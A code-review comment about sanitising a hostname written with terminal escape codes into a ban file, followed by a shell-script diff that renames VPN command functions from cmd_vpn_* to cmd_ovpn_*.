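Review bot: The new first line written to the ban file, `echo -en "# ${CY}${hn:-NAME} ${CDY}${_sf_region:-REGION} ${lglid} ${ip:0:18}${CN}\n$msg"`, embeds ANSI colour escapes and, because of `-e`, interprets any backslash sequences contained in `hn` as well; `hn` is read from `${_self_for_guest_dir}/${lglid}/hostname`, and it is not visible here whether the guest can influence that file's content. If it can, stripping non-printables before use, the way the FCGI script does for form values (`${val//[^[:print:]]}`), keeps the ban record free of terminal escapes and of text that could mislead whoever later reads it; a plain-text header (no `${CY}`/`${CN}`) would also make the file safer to show to a user or feed into other tooling. `_sf_region="$(hostname)"` is evaluated once when the file is sourced, which is fine, but a short comment above `lgban` documenting the header layout (`# line 1: "# <hostname> <region> <lid> <ip>" followed by the optional reason`) would help anyone parsing these files.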

@ -6,7 +6,7 @@
[[ -z "$SF_GUEST_MTU" ]] && SF_GUEST_MTU=$((SF_HOST_MTU - 80)) [[ -z "$SF_GUEST_MTU" ]] && SF_GUEST_MTU=$((SF_HOST_MTU - 80))
cmd_vpn_help() { cmd_ovpn_help() {
echo -en "\ echo -en "\
Use ${C}curl sf/vpn/up -d config=\"\$(pwd)/openvpn.conf\"${N} Use ${C}curl sf/vpn/up -d config=\"\$(pwd)/openvpn.conf\"${N}
Use ${C}curl sf/vpn/up -d config=\"\$(pwd)/openvpn.conf\" -d user=username -d pass=password${N} Use ${C}curl sf/vpn/up -d config=\"\$(pwd)/openvpn.conf\" -d user=username -d pass=password${N}
@ -241,7 +241,7 @@ vpn_stop() {
nsenter.u1000 --setuid 0 --setgid 0 -t "${PID}" -n iptables -F FORWARD 2>/dev/null nsenter.u1000 --setuid 0 --setgid 0 -t "${PID}" -n iptables -F FORWARD 2>/dev/null
} }
cmd_vpn_show() { cmd_ovpn_show() {
load_lg load_lg
[[ -f "/tmp/lg-${LID:-?}/conf/conn.ovpn" ]] && { [[ -f "/tmp/lg-${LID:-?}/conf/conn.ovpn" ]] && {
echo -e "${C}" echo -e "${C}"
@ -252,12 +252,12 @@ cmd_vpn_show() {
exit exit
} }
cmd_vpn_up() { cmd_ovpn_up() {
local str local str
load_lg load_lg
local link_mtu local link_mtu
[[ -z "$R_CONFIG" ]] && cmd_vpn_help [[ -z "$R_CONFIG" ]] && cmd_ovpn_help
WG_DEV="vpnEXIT" WG_DEV="vpnEXIT"
# echo "PID=$PID" # echo "PID=$PID"
@ -379,7 +379,7 @@ Use ${C}curl sf/vpn/down${N} to disconnect.
exit exit
} }
cmd_vpn_del() { cmd_ovpn_del() {
load_lg load_lg
vpn_stop vpn_stop